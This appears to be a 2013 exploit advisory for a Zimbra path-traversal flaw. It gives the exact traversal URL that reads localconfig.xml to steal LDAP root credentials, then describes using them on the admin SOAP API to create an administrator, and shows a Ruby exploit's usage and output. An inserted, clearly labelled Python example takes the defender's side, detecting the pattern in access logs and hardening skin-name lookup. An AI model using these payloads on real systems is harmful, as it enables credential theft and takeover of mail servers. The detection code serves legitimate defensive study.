<code># Exploit Title: Zimbra 0day exploit / Privilege escalation via LFI</code>
<code># Date: 06 Dec 2013</code>
<code># Exploit Author: rubina119</code>
<code># Contact Email : rubina119[at]gmail.com</code>
<code># Vendor Homepage: http://www.zimbra.com/</code>
<code># Version: 2009, 2010, 2011, 2012 and early 2013 versions are affected.</code>
<code># Tested on: Centos(x), Ubuntu.</code>
<code># CVE : No CVE, no patch, just 0day</code>
<code># State : Critical</code>
<code> </code>
<code># Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip</code>
<code>---------------Description-----------------</code>
<code>This script exploits a Local File Inclusion in</code>
<code>/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz</code>
<code>which allows us to read localconfig.xml.</code>
<code>That file contains the LDAP root credentials, which allow us to make requests to the</code>
<code>/service/admin/soap API with the stolen LDAP credentials, create a user</code>
<code>with administration privileges,</code>
<code>and gain access to the Administration Console.</code>
<code>The LFI is located at:</code>
<code>/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00</code>
<code>Example:</code>
<code>https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00</code>
<code>or</code>
<code>https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00</code>
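<code>The following Python example is added here and is not part of this advisory or of Zimbra. It shows, from the defender's side, how to spot the traversal pattern above in web access logs (both the / and the :7071/zimbraAdmin/ variants, including URL-encoded forms and the trailing NUL byte), how to flag a follow-up call to /service/admin/soap from the same source address, and how a server should resolve a skin name so that such a request cannot reach localconfig.xml. The log lines are constructed for the example, and SKIN_ROOT is a hypothetical directory, not Zimbra's real on-disk layout.</code>

```python
"""Detect the skin-parameter path-traversal pattern from the advisory in web
access logs, and show a hardened way to resolve a skin name to a file.
Added example; not part of the original advisory or of Zimbra."""
import posixpath
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in common/combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [06/Dec/2013:10:01:02 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=harmony HTTP/1.1" 200 51234
203.0.113.9 - - [06/Dec/2013:10:02:15 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 4120
203.0.113.9 - - [06/Dec/2013:10:02:40 +0000] "POST /service/admin/soap HTTP/1.1" 200 2048
198.51.100.7 - - [06/Dec/2013:10:03:01 +0000] "GET /zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=1&skin=..%252F..%252Fopt%252Fzimbra%252Fconf%252Flocalconfig.xml%2500 HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The message-bundle endpoint named in the advisory, under / or /zimbraAdmin/.
BUNDLE_RE = re.compile(r"/res/[^?]*\.js\.zgz$")
ADMIN_SOAP = "/service/admin/soap"


def skin_is_suspicious(raw_skin: str) -> bool:
    """True if a skin value carries a '..' path segment or a NUL byte.
    Decodes twice so single- and double-URL-encoded values are both caught."""
    decoded = unquote(unquote(raw_skin)).replace("\\", "/")
    if "\x00" in decoded:
        return True
    return any(seg == ".." for seg in decoded.split("/"))


def scan_log(text: str) -> List[dict]:
    """Return findings: traversal attempts on the bundle endpoint, plus any
    admin SOAP call from an IP that previously made such an attempt."""
    findings, flagged_ips = [], set()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m["ip"], m["target"]
        parts = urlsplit(target)
        if BUNDLE_RE.search(parts.path):
            # parse_qs URL-decodes once; skin_is_suspicious decodes again.
            for skin in parse_qs(parts.query).get("skin", []):
                if skin_is_suspicious(skin):
                    findings.append({"kind": "lfi_attempt", "ip": ip,
                                     "ts": m["ts"], "status": int(m["status"])})
                    flagged_ips.add(ip)
                    break
        elif parts.path == ADMIN_SOAP and ip in flagged_ips:
            findings.append({"kind": "admin_soap_after_lfi", "ip": ip,
                             "ts": m["ts"], "status": int(m["status"])})
    return findings


# Hardened lookup. SKIN_ROOT is a hypothetical directory, not Zimbra's layout.
SKIN_ROOT = "/srv/webapp/skins"
SAFE_SKIN = re.compile(r"[A-Za-z0-9_-]{1,64}")


def resolve_skin_path(skin: str, root: str = SKIN_ROOT) -> Optional[str]:
    """Map a skin name to its bundle file, or return None for anything that is
    not a plain name or that would escape the skin directory."""
    if not SAFE_SKIN.fullmatch(skin):      # allow-list: rejects '/', '..', NUL, '%'
        return None
    candidate = posixpath.normpath(posixpath.join(root, skin, "messages.js"))
    if not candidate.startswith(root.rstrip("/") + "/"):  # defence in depth
        return None
    return candidate


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print(resolve_skin_path("harmony"), resolve_skin_path("../../etc"))
```

<code>Running the block on the constructed log yields two traversal findings and one correlated admin SOAP call from the IP that triggered the first. The allow-list in resolve_skin_path is what closes the hole: a skin name is only ever a short alphanumeric token, so neither a '..' segment nor a NUL byte can reach the filesystem join.</code>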
<code>----------------Exploit-----------------</code>
<code>Before using this exploit, the target server must have the admin console port</code>
<code>"7071" open; otherwise it won't work.</code>
<code>Use the exploit like this:</code>
<code>ruby run.rb -t mail.example.com -u someuser -p Test123_23</code>
<code>[*] Looking if host is vuln....</code>
<code>[+] Host is vuln exploiting...</code>
<code>[+] Obtaining Domain Name</code>
<code>[+] Creating Account</code>
<code>[+] Elevating Privileges</code>
<code>[+] Login Credentials</code>
<code>  [*] Login URL : https://mail.example.com:7071/zimbraAdmin/</code>
<code>  [*] Account : [email protected]</code>
<code>  [*] Password : Test123_23</code>
<code>[+] Successfully Exploited !</code>
<code>The number of vulnerable servers is huge, around 80/100.</code>
<code>This is only for educational purposes.</code>